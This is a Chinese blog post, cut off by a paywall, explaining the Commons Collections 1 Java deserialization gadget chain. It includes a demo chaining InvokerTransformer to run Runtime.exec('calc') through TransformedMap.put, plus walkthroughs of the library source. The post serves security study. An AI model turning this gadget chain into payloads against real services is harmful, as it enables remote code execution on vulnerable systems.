JAVA反序列化之CommonCollections1利用链

已于 2022-08-30 15:32:12 修改
阅读量336 收藏
点赞数
分类专栏: 编程 程序员 Java 文章标签: spring java 数据库
于 2022-08-30 15:32:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lt_xiaodou/article/details/126605111
版权
本文深入剖析JAVA反序列化漏洞中CommonCollections1利用链的工作原理,从TransformedMap、ChainedTransformer、Transformer接口、InvokerTransformer等关键类的分析,揭示调用链的触发机制。通过动态代理和AnnotationInvocationHandler类,展示了如何构造并利用这一漏洞,同时也探讨了为何在jdk8u71之后此类利用链失效。
摘要由CSDN通过智能技术生成

0x01前言

之前简单学习了JAVA反序列化和URLDNS这条利用链,讲过的基础就不再赘述了,今天来学习CommonCollections这条利用链。

0x02分析

由于这条链相对于URLDNS比较复杂,为了更容易理解,所以首先采用P牛精简后的一段DEMO来理解这条利用链:

DEMO1

 1package Commoncollections1;
 2import org.apache.commons.collections.Transformer;
 3import org.apache.commons.collections.functors.ChainedTransformer;
 4import org.apache.commons.collections.functors.ConstantTransformer;
 5import org.apache.commons.collections.functors.InvokerTransformer;
 6import org.apache.commons.collections.map.TransformedMap;
 7
 8import java.lang.annotation.Retention;
 9import java.lang.reflect.Constructor;
10import java.util.HashMap;
11import java.util.Map;
12
13class CommonCollections1 {
14    void main(String[] args) throws Exception {
15        Transformer[] transformers = new Transformer[]{
16                new ConstantTransformer(Runtime.getRuntime()),
17                new InvokerTransformer("exec", new Class[]{String.class},
18                        new Object[]
19                                {"calc"}),
20        };
21        Transformer transformerChain = new
22                ChainedTransformer(transformers);
23        Map innerMap = new HashMap();
24        Map outerMap = TransformedMap.decorate(innerMap, null,
25                transformerChain);
26        outerMap.put("test", "xxxx");
27    }
28}

在windows环境中,运行以上代码会发现打开了计算器。如果是其他系统需要将calc换成想要执行的程序路径。

简单看看代码,通过参数来看,发现最后一句代码好像没什么用似的,删掉试试。

结果发现不能打开计算器了,这说明,最终触发执行代码的代码是最后一条。

TransformedMap类

outerMap对象是TransformedMap.decorate返回的,所以要先研究一下这个类是干嘛用的,首先看一下这个类的继承图:

图1

通过类名可以看出,这是一个Map的装饰类,对应设计模式的装饰器模式。目的是为了向一个现有的对象添加新的功能,同时又不改变其结构。这个类中对原始类的某些接口的功能进行了扩展。

跟进这个TransformedMap类看看实现:

1    public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {
2        return new TransformedMap(map, keyTransformer, valueTransformer);
3    protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {
4        super(map);
5        this.keyTransformer = keyTransformer;
6        this.valueTransformer = valueTransformer;
7    }

可以看到,decorate中new了一个自身对象并返回,也就是调用了自己的构造函数,而构造函数调用了父类的构造函数,然后将两个Transformer类型的参数保存到了成员变量中。

继续看看这个类的put方法,为什么会执行代码:

 1    public Object put(Object key, Object value) {
 2        key = this.transformKey(key);
 3        value = this.transformValue(value);
 4        return this.getMap().put(key, value);
 5    }
 6    protected Object transformKey(Object object) {
 7        return this.keyTransformer == null?object:this.keyTransformer.transform(object);
 8    }
 9
10    protected Object transformValue(Object object) {
11        return this.valueTransformer == null?object:this.valueTransformer.transform(object);
12    }

可以看出,put方法首先调用了自己的transformKey方法和transformValue方法,然后调用了map的put方法。而transformKey和transformValue都是调用了我们开始传参进去的Transformer对象的transform方法。

ChainedTransformer类

仔细观察会发现,构造TransformedMap对象的时候,我们传参的Transformer类对象是一个transformerChain对象。

1Transformer transformerChain = new
2                ChainedTransformer(transformers);
3        Map innerMap = new HashMap();
4        Map outerMap = TransformedMap.decorate(innerMap, null,
5                transformerChain);

首先看一下继承图:

图2

可以看出transformerChain类是Transformer的子类,根据构造这个类的代码可以看出,这个类构造参数是一个Transformer数组,看一下实现代码:

1    public ChainedTransformer(Transformer[] transformers) {
2        this.iTransformers = transformers;
3    }
4
5    public Object transform(Object object) {
6        for(int i = 0; i < this.iTransformers.length; ++i) {
7            object = this.iTransformers[i].transform(object);
8        }

可以看到,构造函数直接将传入的参数保存在iTransformers成员变量中。而transform方法的实现则是循

最低0.47元/天 解锁文章
头顶假发
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java原生反序列化漏洞利用(URLDNS)
m0_55994898的博客
08-03 207
反序列化漏洞指在代码中存在不安全的反序列化操作(可控的序列化数据流入了反序列化方法中),在绝大多数编程语言中通常都有序列化/反序列化的功能(例如PHP,Java,Python),在序列化/反序列化的过程中通常会自动调用一些固定的方法,在PHP中序列化/反序列化时会调用对应类中的。
[Java反序列化]CommonsCollections1利用学习(下)
feng的博客
08-14 447
前言 白天学习了CommonsCollections1的TransformedMap,感觉打开了新世界的大门,所以晚上学习了LazyMap,感觉也没那么难理解,可能是因为我在看CC之前已经把基础知识都给过了一遍叭,所以才没那么困难。 环境 <dependencies> <dependency> <groupId>commons-collections</groupId> <artifactId>com
Java反序列化3-CommonsCollections1利用分析
weixin_43263451的博客
07-06 309
本文分析的是yso中CommonCollections1的payload,其payload前半段前文已经分析过,重点是对后半段的讲解。上一节的payload是利用TransformedMap来完成CommonsCollections利用的(当调用put方法时会调用transform方法)这次没有利用TransformedMap,而是利用LazyMap来完成CommonsCollections利用,其中还涉及到了动态代理,该payload稍微麻烦了一点。调用图示:https://blog.csdn.
commons-collections4-4.1
11-01
开发团队通过修改和限制库中的反序列化行为,增强了安全性,防止了恶意数据利用这些方法进行攻击。这个修复对于那些依赖于Commons Collections的中间件和应用程序来说至关重要,因为它们需要确保能够抵御这类攻击。 ...
Java面试八股文十万字总结.docx
04-11
Java序列化中如果有些字段不想进行序列化,怎么办** 可以使用`transient`关键字标记不希望序列化的字段。 **28. 说说Java中的IO流** - **InputStream/OutputStream**:输入输出流的基类。 - **Reader/Writer**:...
JAVA面试_Dubbo常问面试题30个.pdf
02-28
- Java标准序列化可能存在安全风险,并依赖较旧的Common-Collections库。 3. **webservice协议**: - 基于WebService的远程调用,集成CXF实现,支持与原生WebService的互操作。 - 使用HTTP协议,同步传输,适合...
Java程序员面试的试题集(1---122)
01-29
### Java程序员面试知识点详解 #### 一、面向对象的基本特征 在Java编程中,面向对象的概念至关重要,主要包括以下几个方面: 1. **抽象** 抽象是指在设计时忽略对象的一些非关键特性,以便更好地关注与当前...
java json 操作 jar包 comm jar包
09-04
1. `jackson-databind-2.4.1.jar`:这是Jackson的核心模块,提供了将Java对象映射到JSON和从JSON反序列化Java对象的能力,即对象绑定功能。例如,你可以通过`ObjectMapper`类将Java对象转换为JSON字符串,或者将...
Java Shiro反序列化CommonsCollections利用分析
最新发布
qq_44192006的博客
04-24 688
本文主要分析CC1利用,先介绍了复现环境的搭建(该小节尽量帮大家避避坑,呜呜呜);然后紧跟着讲解了java反序列化和php反序列化漏洞的区别(希望大家不要有惯性思维认为反序列化漏洞都一样,其实java反序列化和php反序列化的差别还是很大的并介绍了复现学习java反序列化漏洞所需的一些前置知识;最后,也是文章的主体部分,从Sink(即可以触发执行命令的方法等)、chain及source(即利用的入口点)三个步骤,讲述利用的构建。纸上得来终觉浅,绝知此事要躬行。
Java安全学习笔记--反序列化利用CC1(1)
m0_64685672的博客
01-16 1060
测试环境 jdk1.7(jdk7u80) CommonCellection3.1 预备知识简述 反射 每个类在第一次创建时会生成一个class实例,这个class实例保存着类的所有信息,可以通过: public Field[] getFields(); //返回类的成员方法 public Method[] getMethods(); //返回类的构造方法 public Constructor<T> getConstructor(Class<?>... para
Java安全学习笔记--反序列化利用CC7
m0_64685672的博客
01-27 1426
测试环境: jdk1.8(jdk8u71) Commons Collections4.0 Hashtable 和HashMap很相似,使用地址法解决哈希冲突,线程安全 Cc7和cc6差不多,cc7使用Hashtable来触发LazyMap的get方法,比cc6的稍微复杂一些。 利用核心 final Transformer chainedTransformer= new ChainedTransformer(new Transformer[0]); Transfo
Java反序列化调用
GalaxySpaceX的博客
09-19 362
Java反序列化调用分析
Commons Collections利用
Townmacro的博客
04-04 847
Commons Collections反序列化利用
Java反序列化之URLDNS
m0_62466350的博客
05-28 772
URLDNSjava原生态的一条利用,通常用于存在反序列化漏洞进行验证的,因为是原生态,不存在什么版本限制。不限制jdk版本,使用Java内置类,对第三方依赖没有要求目标无回显,可以通过DNS请求来验证是否存在反序列化漏洞URLDNS利用,只能发起DNS请求,并不能进行其他利用这条路还是比较简单的,通常用于存在反序列化漏洞进行验证的,学好了才能更好的为后面打基础。
告别脚本小子系列丨JAVA安全(6)——反序列化利用(上)
C20220511的博客
06-24 1109
我们通常把反序列化漏洞和反序列化利用分开来看,有反序列化漏洞不一定有反序列化利用(经常用shiro反序列化工具的人一定遇到过一种场景就是找到了key,但是找不到gadget,这也就是在这种场景下没有可利用反序列化利用)。如果我们向某个漏洞提交平台提交一个反序列化漏洞,但是不给反序列化利用,那么平台大概率是不会接受这种漏洞的。...
6-java安全——java反序列化漏洞利用
网络安全
07-01 4105
本篇将学习java反序列化漏洞原理,然后结合一个apache commons-collections组件反序列化漏洞来学习如何构造利用。 我们知道序列化操作主要是由ObjectOutputStream类的 writeObject()方法来完成,反序列化操作主要是由ObjectInputStream类的readObject()方法来完成。当可序列化对象重写了readObject方法后,在反序列化时一般会调用序列化对象的readObject方法。 在Student类中重写ObjectInputSt
java安全】原生反序列化利用JDK7u21
leekos的博客,分享web安全相关知识~
08-03 3200
进行反序列化利用。我们肯定会想,如果不利用第三方类库,能否进行反序列化利用呢?这里还真有:JDK7u21。但是只适用于java 7u及以前的版本在使用这条利用时,需要设置jdk为jdk7u21。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值